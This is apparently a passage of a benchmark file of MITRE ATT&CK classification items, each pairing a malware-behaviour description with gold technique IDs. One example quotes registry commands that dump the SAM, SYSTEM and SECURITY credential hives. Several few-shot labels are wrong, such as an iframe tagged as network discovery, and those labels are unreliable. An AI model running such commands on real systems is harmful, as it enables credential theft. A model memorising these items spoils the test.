The backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "CharmPower has the ability to download additional modules to a compromised host.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT38 has used a custom MBR wiper named BOOTWRECK, which will initiate a system reboot after wiping the victim's MBR.\n\t - T1529: System Shutdown/Reboot\n- Text: This function converts the given domain to \u201cbackdoor\u201d, which can be used to login to the tenant as any user. See Open-AADIntOffice365Portal to use the backdoor\n\t - T1484: Domain or Tenant Policy Modification\n- Text: (Source: Dell SecureWorks) As shown in Figure 10, the unpacked JavaScript code reveals an iframe pointing to an IP address that is hosting the exploit\n\t - T1016: System Network Configuration Discovery\n", + "input": "Olympic Destroyer will shut down the compromised system after it is done modifying system configuration settings.", + "gold": "- T1529: System Shutdown/Reboot", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GoldMax has impersonated systems management software to avoid detection.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: Stuxnet uses a driver registered as a boot start service as the main load-point.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: The TAINTEDSCRIBE main executable has disguised itself as Microsoft\u2019s Narrator.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n", + "input": "InnaputRAT variants have attempted to appear legitimate by adding a new service named OfficeUpdateService.", + "gold": "- T1036.004: Masquerading - Masquerade Task or Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: STARWHALE can collect data from an infected local host.\n\t - T1005: Data from Local System\n- Text: CopyKittens uses ZPP, a .NET console program, to compress files with ZIP.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: Emotet could be dropping malware with Remote Access Trojan (RAT) capabilities damaging the integrity of the overall network. After reviewing systems for Emotet indicators, reimage and move clean systems to a containment VLAN, segregated from the infected network. It is possible that the Outlook account may now have rules to auto-forward all emails to an external email address, which could result in a data breach. Search base64 encoded network stream data referencing the organization\u2019s email domain. If references are found, perform additional analysis to see if a data breach has occurred\n\t - T1114.001: Email Collection - Local Email Collection\n", + "input": "APT1 has collected files from a local victim.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Office365DCOMCheck.vbs or SystemDiskClean.vbs) within the %TEMP% folder: CreateObject(\"WScript.Shell\").Run \"\" & WScript.Arguments(0) & \"\", 0, False The scheduled task will then run every five minutes, which provides persistent execution of the downloader script\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: This final payload is the ThreatNeedle loader running in memory. In addition, the malware saves the configuration data as a registry key encrypted in RC4\n\t - T1112: Modify Registry\n- Text: Turian can insert pseudo-random characters into its network encryption setup.\n\t - T1001.001: Data Obfuscation - Junk Data\n", + "input": "Netwalker can add the following registry entry: \"HKEY_CURRENT_USER\\SOFTWARE\\{8 random characters}\".", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: QuasarRAT can obtain passwords from common web browsers.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: PoetRAT used voStro.exe, a compiled pypykatz (Python version of Mimikatz), to steal credentials.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: Okrum was seen using modified Quarks PwDump to perform credential dumping.\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n", + "input": "HOMEFRY can perform credential dumping.", + "gold": "- T1003: OS Credential Dumping", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CARROTBALL has been executed through users being lured into opening malicious e-mail attachments.\n\t - T1204.002: User Execution - Malicious File\n- Text: Last week, Unit 42 released a blog on a newly named threat group called DarkHydrus that we observed targeting government entities in the Middle East. The attack that we discussed in our previous publication involved spear-phishing to deliver a PowerShell payload we call RogueRobin; however, we are aware of DarkHydrus carrying out a credential harvesting attack in June 2018. It also appears that this an ongoing campaign, as we have evidence of previous credential harvesting attempts using the same infrastructure dating back to the Fall of 2017. The credential harvesting attacks used spear-phishing emails that contained malicious Microsoft Office documents that leveraged the \u201cattachedTemplate\u201d technique to load a template from a remote server. When attempting to load this remote template, Microsoft Office will display an authentication dialog box to ask the user to provide login credentials. When entered, these credentials are then sent to the C2 server, which allows DarkHydrus to collect the user account credentials. Based on Unit 42\u2019s analysis, DarkHydrus used the open-source Phishery tool to create two of the known Word documents used in these credential harvesting attacks. As discussed in our previous blog, this further strengthens DarkHydrus\u2019 use of the open source for their attack tools. A phishing attack to steal credentials like this is not new: US-CERT warned of the same technique by a different threat group in 2017. Based on this, we can reasonably presume this group will continue to carry out attacks against these kinds of targets in the Middle East in the near-future\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: QakBot has gained execution through users opening malicious links.\n\t - T1204.001: User Execution - Malicious Link\n", + "input": "Lazarus Group has attempted to get users to launch a malicious Microsoft Word attachment delivered via a spearphishing email.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Group has used the Plink utility to create SSH tunnels.\n\t - T1572: Protocol Tunneling\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: Rocke has used SSH private keys on the infected machine to spread its coinminer throughout a network.\n\t - T1552.004: Unsecured Credentials - Private Keys\n- Text: Skidmap also sets up a way to gain backdoor access to the machine. It does this by having the binary add the public key of its handlers to the authorized_keys file, which contains keys needed for authentication\n\t - T1098.004: Account Manipulation - SSH Authorized Keys\n", + "input": "Ebury can intercept private keys using a trojanized \"ssh-add\" function.", + "gold": "- T1556: Modify Authentication Process", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: jRAT has been distributed as HTA files with JScript.\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n- Text: Donut can generate shellcode outputs that execute via Ruby.\n\t - T1059: Command and Scripting Interpreter\n- Text: The implanted VBS file is capable of reporting information about infected machines and downloading additional payloads with an encoded format\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "FIN7 used JavaScript scripts to help perform tasks on the victim's machine.", + "gold": "- T1059.007: Command and Scripting Interpreter - JavaScript", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CostaRicto has set up remote SSH tunneling into the victim's environment from a malicious domain.\n\t - T1572: Protocol Tunneling\n- Text: Once gaining the initial foothold into a container, Hildegard establishes either a tmate session or an IRC channel back to the C2. It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose. Unit 42 researchers have not observed any commands in the IRC channel. However, the IRC server's metadata indicates that the server was deployed on Jan\n\t - T1071: Application Layer Protocol\n- Text: Matryoshka uses DNS for C2.\n\t - T1071.004: Application Layer Protocol - DNS\n", + "input": "Cobalt Strike uses a custom command and control protocol that is encapsulated in HTTP, HTTPS, or DNS. In addition, it conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.", + "gold": "- T1572: Protocol Tunneling", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The attacker then executed a persistent malicious PowerShell code that was used to download and execute another PowerShell backdoor file in the server from the malicious IP address 185[.]82[.]219[.]201, as shown in Figure 7.\n\t - T1590.005: Gather Victim Network Information - IP Addresses\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1027.003: Obfuscated Files or Information - Steganography\n\t - T1216: System Script Proxy Execution\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n- Text: CreepyDrive can download files to the compromised host.\n\t - T1105: Ingress Tool Transfer\n- Text: Valak can download additional modules and malware capable of using separate C2 channels.\n\t - T1104: Multi-Stage Channels\n", + "input": "Valak has used PowerShell to download additional modules.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: cmd can be used to find information about the operating system.\n\t - T1082: System Information Discovery\n- Text: When the actor modifies the file and changes the modification_time, the Trojan downloads the contents from the file by creating an HTTP request to a URL structured as follows: + + \u201c?alt=media\u201d The Trojan processes the downloaded data within the file the same way it would to obtain a job from data received from the DNS tunneling channel using the TXT query mode, specifically by searching the data using the following regular expression: ([^r-v\\\\s]+)[r-v]([\\\\w\\\\d+\\\\/=]+).(||) The Trojan function splits the matching data, specifically the subdomain on a separator that is a character between r and v and uses the data before the separator to get the sequence number and a Boolean value (0 or 1) if more data is expected\n\t - T1074: Data Staged\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1048: Exfiltration Over Alternative Protocol\n\t - T1486: Data Encrypted for Impact\n- Text: During Frankenstein, the threat actors collected information via Empire, which sent the data back to the adversary's C2.\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "GoldenSpy has gathered operating system information.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group has renamed malicious code to disguise it as Microsoft's narrator and other legitimate files.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: OSX_OCEANLOTUS.D has disguised its app bundle by adding special characters to the filename and using the icon for legitimate Word documents.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: Rover copies files from removable drives to \"C:\\system\".\n\t - T1074.001: Data Staged - Local Data Staging\n", + "input": "NOKKI is written to %LOCALAPPDATA%\\MicroSoft Updatea\\svServiceUpdate.exe prior being executed in a new process in an apparent attempt to masquerade as a legitimate folder and file.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: collects Keychain storage data and copies those passwords/tokens to a file.\n\t - T1555.001: Credentials from Password Stores - Keychain\n- Text: During Operation CuckooBees, the threat actors leveraged a custom tool to dump OS credentials and used following commands: `reg save HKLM\\\\SYSTEM system.hiv`, `reg save HKLM\\\\SAM sam.hiv`, and `reg save HKLM\\\\SECURITY security.hiv`, to dump SAM, SYSTEM and SECURITY hives.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n- Text: The attackers are using a tool with name plainpwd in order to dump Windows credentials from memory. This tool is a slightly modified version of the open-source project mimikatz\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", + "input": "menuPass has used a modified version of pentesting tools wmiexec.vbs and secretsdump.py to dump credentials.", + "gold": "- T1003.002: OS Credential Dumping - Security Account Manager\n- T1003.004: OS Credential Dumping - LSA Secrets", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The very narrow and specific set of email identifiers and organizations observed by CTU researchers strongly indicate that the campaign is focused on U.S. Based on the identified targets, CTU researchers assess with low confidence that a Russian government-sponsored threat group may be responsible for this campaign. Third-party researchers attribute this campaign to the Russia-based IRON RITUAL threat group (also known as NOBELIUM and APT29). IRON RITUAL has been linked to the SUNBURST malware used in the SolarWinds supply chain attack\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: Javali has achieved execution through victims clicking links to malicious websites.\n\t - T1204.001: User Execution - Malicious Link\n- Text: Victims receive spear phishing emails with attached malicious zip files - typically password protected or HTML file. That file contains an ISO file.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "Cobalt Group has sent emails with URLs pointing to malicious documents.", + "gold": "- T1566.002: Phishing - Spearphishing Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: To establish persistence, Truvasys adds a Registry Run key with a value \"TaskMgr\" in an attempt to masquerade as the legitimate Windows Task Manager.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: PUNCHBUGGY mimics filenames from %SYSTEM%\\System32 to hide DLLs in %WINDIR% and/or %TEMP%.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: BlackTech has used right-to-left-override to obfuscate the filenames of malicious e-mail attachments.\n\t - T1036.002: Masquerading - Right-to-Left Override\n", + "input": "Fox Kitten has named the task for a reverse proxy lpupdate to appear legitimate.", + "gold": "- T1036.004: Masquerading - Masquerade Task or Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stealth Falcon malware gathers the Address Resolution Protocol (ARP) table from the victim.\n\t - T1016: System Network Configuration Discovery\n- Text: Each time a new drive is inserted, generates a list of all files on the drive and stores it in an encrypted file.\n\t - T1119: Automated Collection\n- Text: Aria-body has the ability to gather TCP and UDP table status listings.\n\t - T1049: System Network Connections Discovery\n", + "input": "Tropic Trooper has used scripts to collect the host's network topology.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lock PowerShell Execution Policy, must be set to \u201cAllSigned\u201d via GPO\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: SILENTTRINITY has the ability to set its window state to hidden.\n\t - T1564.003: Hide Artifacts - Hidden Window\n- Text: A Python script was created for the purpose of automating this configuration file decoding process. The output of this script when run against the configuration file used by the first of the two Parliamentarian operation samples yielded the following data\n\t - T1059.006: Command and Scripting Interpreter - Python\n", + "input": "BONDUPDATER is written in PowerShell.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gamaredon Group has delivered macros which can tamper with Microsoft Office security settings.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: Pay2Key can stop the MS SQL service at the end of the encryption process to release files locked by the service.\n\t - T1489: Service Stop\n- Text: Lateral movement was done through Cobalt Strike. This tool was also used to distribute BAT files that will be used later for various purposes, including impairing the system\u2019s defenses.\n\t - T1588.002: Obtain Capabilities - Tool\n\t - T1562: Impair Defenses\n\t - T1570: Lateral Tool Transfer\n", + "input": "LockerGoga installation has been immediately preceded by a \"task kill\" command in order to disable anti-virus.", + "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GoldMax has used scheduled tasks to maintain persistence.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: Then calls the fcL4qOb4 function to set the scheduled task and disguise as the one used by Google\n\t - T1036.004: Masquerading - Masquerade Task or Service\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: Anchor can install itself as a cron job.\n\t - T1053.003: Scheduled Task/Job - Cron\n", + "input": "Magic Hound has used scheduled tasks to establish persistence.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Downloaded payload is a variant of a cloud-based RAT known as RokRat which has been used by this group since 2017. This RAT is known to steal data from a victim\u2019s machine and send them to cloud services (Pcloud, Dropbox, Box, Yandex\n\t - T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage\n- Text: APT28 has used newly-created Blogspot pages for credential harvesting operations.\n\t - T1583.006: Acquire Infrastructure - Web Services\n- Text: Peirates can use stolen service account tokens to perform its operations.\n\t - T1078.004: Valid Accounts - Cloud Accounts\n", + "input": "Confucius has obtained cloud storage service accounts to host stolen data.", + "gold": "- T1583.006: Acquire Infrastructure - Web Services", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: If the mutex does not exist and a Windows Startup Registry key with name \u201cSystem Update\u201d does not exist, the malware performs its initialization routine by: Copying itself to the path %PROGRAMDATA%\\svchost.exe Sets the Windows Startup Registry key with the name \u201cSystem Update\u201d which points to the above dropped payload\n\t - T1112: Modify Registry\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: The persistence is done during the first execution of the malware using a well-known technique, the \u201cLogon scripts\u201d. It creates a script file registration.bat and writes several strings from the TForm1 object. The final script is\n\t - T1037.001: Boot or Logon Initialization Scripts - Logon Script (Windows)\n- Text: stores configuration values under the Registry key HKCU\\Software\\Microsoft\\[dllname] and modifies Registry keys under HKCR\\CLSID\\...\\InprocServer32with a path to the launcher.\n\t - T1112: Modify Registry\n", + "input": "Bisonal has added itself to the Registry key \"HKEY_CURRENT_USER\\Software\\Microsoft\\CurrentVersion\\Run\\\" for persistence.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: packs a plugin with UPX.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: Ramsay has included a rootkit to evade defenses.\n\t - T1014: Rootkit\n- Text: Higaisa used AES-128 to encrypt C2 traffic.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "Uroburos uses a custom packer.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Figure 5 shows Phishery\u2019s output to the command that injects a URL into a file named \u201cgood_test.docx\u201d, which it will save the resulting file to \u201cbad_test.docx\u201d\n\t - T1055: Process Injection\n- Text: As part of Reflective DLL loading the malware performs the following tasks on the DLL it has unwrapped in memory: Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL) - Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: Some versions of the Orz backdoor have 32- and 64-bit embedded DLLs, stored internally as base64 strings. Their purpose is to simply run another binary. These are used as loaders for future executable payloads, using the well-known process hollowing technique. To use the MockDll, the backdoor creates a configuration .ini file like that shown in Figure 14\n\t - T1055.012: Process Injection - Process Hollowing\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n", + "input": "HyperBro can run shellcode it injects into a newly created process.", + "gold": "- T1055: Process Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: UNC2452 used \"cmd.exe\" to execute commands on remote machines.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Goopy has the ability to delete emails used for C2 once the content has been copied.\n\t - T1070: Indicator Removal\n\t - T1070.008: Indicator Removal - Clear Mailbox Data\n- Text: APT41 leveraged sticky keys to establish persistence.\n\t - T1546.008: Event Triggered Execution - Accessibility Features\n", + "input": "Sowbug has used command line during its intrusions.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Empire can find shared drives on the local system.\n\t - T1135: Network Share Discovery\n- Text: StrongPity can parse the hard drive on a compromised host to identify specific file extensions.\n\t - T1083: File and Directory Discovery\n- Text: Egregor can collect any files found in the enumerated drivers before sending it to its C2 channel.\n\t - T1039: Data from Network Shared Drive\n", + "input": "Ryuk has enumerated files and folders on all mounted drives.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In the past we have seen others techniques that used Bitcoin blockchain to hide their C&C server IP address, but in this blog we will share an analysis of the new technique\n\t - 